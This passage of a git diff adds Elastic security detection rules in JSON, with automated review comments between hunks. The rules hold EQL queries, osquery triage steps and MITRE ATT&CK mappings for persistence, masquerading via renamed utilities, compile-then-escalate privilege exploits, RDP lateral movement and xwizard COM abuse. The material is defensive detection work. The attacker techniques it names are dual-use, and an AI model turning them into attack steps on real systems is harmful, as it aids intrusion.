"https://opensource.com/article/20/7/systemd-timers", + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"17b0a495-4d9f-414c-8ad0-92f018b8e001", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "17b0a495-4d9f-414c-8ad0-92f018b8e001_9", + "type": "security-rule" +} \ No newline at end of file 
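Review bot: The first "Retrieve File Listing Information" osquery in `note` hard-codes `path LIKE '/home/user/.config/systemd/user/%'`, so on any host where the affected account is not literally named `user` it silently misses the per-user systemd directory, while the very next query correctly uses `/home/{{user.name}}/.config/systemd/user/%`. The first query should use the same placeholder (or `'/home/%/.config/systemd/user/%'` if the intent is to list every user's directory), matching what the `query` field itself matches with `/home/*/.config/systemd/user/*`. Separately, the `setup` text links to `fleet/8.10/agent-policy.html` while the other links in the same guide use `current`; pinning one link to a fixed version will go stale.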
diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108.json new file mode 100644 index 00000000000..f4f7b013aa4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed Utility Executed with Short Program Name", + "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109.json new file mode 100644 index 00000000000..5d98f6396b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109.json 
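Review bot: The description ("single character process name") does not match the query, which matches any five-character `process.name` (`length(process.name) == 5`), so a two-character stem with a three-character extension is alerted on as well, while the `length(process.name) > 0` clause is redundant once `== 5` is required. I would drop the redundant clause, `process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) == 5 and length(process.pe.original_file_name) > 5`, and reword the description to say what is really tested, e.g. `"description": "Identifies the execution of a process whose name is five characters long (for example a single character plus a four-character extension) and shorter than its PE original file name. ..."`. The same text and query are carried verbatim by the `_109` copy of this rule in the next hunk, whose only difference is the narrower `logs-endpoint.events.process-*` index pattern, so both files need the same change.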
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed Utility Executed with Short Program Name", + "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3.json b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3.json new file mode 100644 index 00000000000..204ef6591f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3.json 
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a high count of source IPs establishing an RDP connection with a single destination IP. Attackers might use multiple compromised systems to attack a target to ensure redundancy in case a source IP gets detected and blocked.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_rdp_distinct_count_source_ip_for_destination", + "name": "Spike in Number of Connections Made to a Destination IP", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "18a5dd9a-e3fa-4996-99b1-ae533b8f27fc", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4.json b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4.json new file mode 100644 index 00000000000..a6ae1b33de3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Recently Compiled Executable", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"gcc\", \"g++\", \"cc\") and user.id != \"0\"] by process.args\n [file where host.os.type == \"linux\" and event.action == \"creation\" and event.type == \"creation\" and \n process.name == \"ld\" and user.id != \"0\"] by file.name\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n user.id != \"0\"] by process.name\n [process where host.os.type == \"linux\" and event.action in (\"uid_change\", \"guid_change\") and event.type == \"change\" and \n user.id == \"0\"] by process.name\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"193549e8-bb9e-466a-a7f9-7e783f5cb5a6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "193549e8-bb9e-466a-a7f9-7e783f5cb5a6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3.json b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3.json new file mode 100644 index 00000000000..4976f8df6bb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3.json 
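Review bot: `guid_change` in the last sequence step, `event.action in ("uid_change", "guid_change")`, looks like a typo for `gid_change`, which is the action name I would expect Elastic Defend to emit for a group-id change; if so, that alternative can never match and the step effectively reduces to `uid_change`. Please confirm against the `event.action` values the endpoint package actually produces before changing it, and since the description talks only about "alteration of UID permissions", consider whether the group-id case is wanted at all rather than just fixing the spelling. Either way the rule's `required_fields` and description should agree with the final value set.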
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high number of processes started in a single RDP session. Executing a large number of processes remotely on other machines can be an indicator of lateral movement activity.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_sum_rdp_number_of_processes", + "name": "Spike in Number of Processes in an RDP Session", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "19e9daf3-f5c5-4bc2-a9af-6b1e97098f03", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "19e9daf3-f5c5-4bc2-a9af-6b1e97098f03_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_108.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_108.json new file mode 100644 index 00000000000..5462cf91159 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_108.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Component Object Model (COM) is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects or executable code. Xwizard can be used to run a COM object created in registry to evade defensive counter measures.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of COM object via Xwizard", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"xwizard.exe\" or ?process.pe.original_file_name : \"xwizard.exe\") and\n (\n (process.args : \"RunWizard\" and process.args : \"{*}\") or\n (process.executable != null and\n not process.executable : (\"C:\\\\Windows\\\\SysWOW64\\\\xwizard.exe\", \"C:\\\\Windows\\\\System32\\\\xwizard.exe\")\n )\n )\n", + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + 